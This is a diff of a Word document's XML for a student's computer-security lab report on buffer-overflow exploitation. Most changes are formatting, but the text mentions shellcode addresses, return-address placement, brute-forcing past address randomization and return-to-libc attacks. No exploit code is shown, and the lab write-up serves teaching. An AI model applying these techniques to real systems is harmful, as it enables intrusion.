+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>return-to-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is not hard to design and implement.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId35"/>
-      <w:headerReference w:type="default" r:id="rId36"/>
-      <w:footerReference w:type="even" r:id="rId37"/>
-      <w:footerReference w:type="default" r:id="rId38"/>
-      <w:headerReference w:type="first" r:id="rId39"/>
-      <w:footerReference w:type="first" r:id="rId40"/>
+      <w:headerReference w:type="even" r:id="rId41"/>
+      <w:headerReference w:type="default" r:id="rId42"/>
+      <w:footerReference w:type="even" r:id="rId43"/>
+      <w:footerReference w:type="default" r:id="rId44"/>
+      <w:headerReference w:type="first" r:id="rId45"/>
+      <w:footerReference w:type="first" r:id="rId46"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -15322,9 +15322,9 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605CEB90" wp14:editId="4212E167">
-            <wp:extent cx="2472083" cy="3876675"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605CEB90" wp14:editId="42A5A591">
+            <wp:extent cx="2185074" cy="3426594"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
             <wp:docPr id="34" name="图片 34"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -15345,7 +15345,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2487436" cy="3900752"/>
+                      <a:ext cx="2200822" cy="3451290"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -15484,17 +15484,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>O</w:t>
       </w:r>
       <w:r>
@@ -15515,6 +15515,102 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After task 2 I think the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>return-to-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is not hard to design and implement.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="00B0F0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="00B0F0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>All the code files and reports are</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="00B0F0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> also</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="00B0F0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> available on: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId41" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ae"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="00B0F0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://github.com/EnzeXu/Computer_Security_Enze_Xu_Project2</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15531,50 +15627,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">After task 2 I think the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>return-to-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>libc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> attack</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is not hard to design and implement.</w:t>
+        <w:t>Thank you~</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId41"/>
-      <w:headerReference w:type="default" r:id="rId42"/>
-      <w:footerReference w:type="even" r:id="rId43"/>
-      <w:footerReference w:type="default" r:id="rId44"/>
-      <w:headerReference w:type="first" r:id="rId45"/>
-      <w:footerReference w:type="first" r:id="rId46"/>
+      <w:headerReference w:type="even" r:id="rId42"/>
+      <w:headerReference w:type="default" r:id="rId43"/>
+      <w:footerReference w:type="even" r:id="rId44"/>
+      <w:footerReference w:type="default" r:id="rId45"/>
+      <w:headerReference w:type="first" r:id="rId46"/>
+      <w:footerReference w:type="first" r:id="rId47"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>
@@ -16517,6 +16579,29 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="ae">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00000344"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="af">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00000344"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -1429,44 +1429,44 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>2.4 Task 2: Exploiting the Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>This t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>2.4 Task 2: Exploiting the Vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>This t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1501,6 +1501,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4107,26 +4108,26 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
@@ -4149,14 +4150,15 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4322,7 +4324,7 @@
             <w:pPr>
               <w:jc w:val="left"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -4350,7 +4352,7 @@
             <w:pPr>
               <w:jc w:val="left"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -4394,7 +4396,7 @@
             <w:pPr>
               <w:jc w:val="left"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
@@ -4415,7 +4417,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4827,7 +4829,7 @@
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="宋体"/>
           <w:kern w:val="0"/>
           <w:sz w:val="13"/>
           <w:szCs w:val="13"/>
@@ -5134,7 +5136,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5300,18 +5302,18 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>S</w:t>
       </w:r>
       <w:r>
@@ -5360,6 +5362,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5412,6 +5415,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5465,6 +5469,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5546,23 +5551,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Then I first tested </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>0xbffff0d8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as the shellcode address, but I failed until I added 128 to it</w:t>
+        <w:t xml:space="preserve">Then I first tested 0xbffff0d8 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 40 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>as the shellcode address, but I failed until I added 128 to it</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5794,39 +5807,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">To find </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">where should </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the address</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> be put in the buffer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, at the beginning I located it almost everywhere, and luckily, it worked.</w:t>
+        <w:t>To find where should the address be put in the buffer, at the beginning I located it almost everywhere, and luckily, it worked.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6706,7 +6687,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -7115,7 +7096,7 @@
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="13"/>
@@ -7279,7 +7260,7 @@
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
           <w:color w:val="008000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="13"/>
@@ -8019,17 +8000,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>C</w:t>
       </w:r>
       <w:r>
@@ -8053,6 +8034,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -8131,6 +8113,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -8183,6 +8166,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -8228,17 +8212,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>I</w:t>
       </w:r>
       <w:r>
@@ -8247,23 +8231,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">t seems I am so lucky that it cost me less than </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>minute to defeat the randomization.</w:t>
+        <w:t>t seems I am so lucky that it cost me less than 1 minute to defeat the randomization.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8557,15 +8525,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <m:t>=8.44</m:t>
-          </m:r>
-          <m:r>
-            <w:rPr>
-              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
-              <w:sz w:val="24"/>
-              <w:szCs w:val="24"/>
-            </w:rPr>
-            <m:t>×</m:t>
+            <m:t>=8.44×</m:t>
           </m:r>
           <m:sSup>
             <m:sSupPr>
@@ -8723,23 +8683,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <m:t>=1</m:t>
-          </m:r>
-          <m:r>
-            <w:rPr>
-              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
-              <w:sz w:val="24"/>
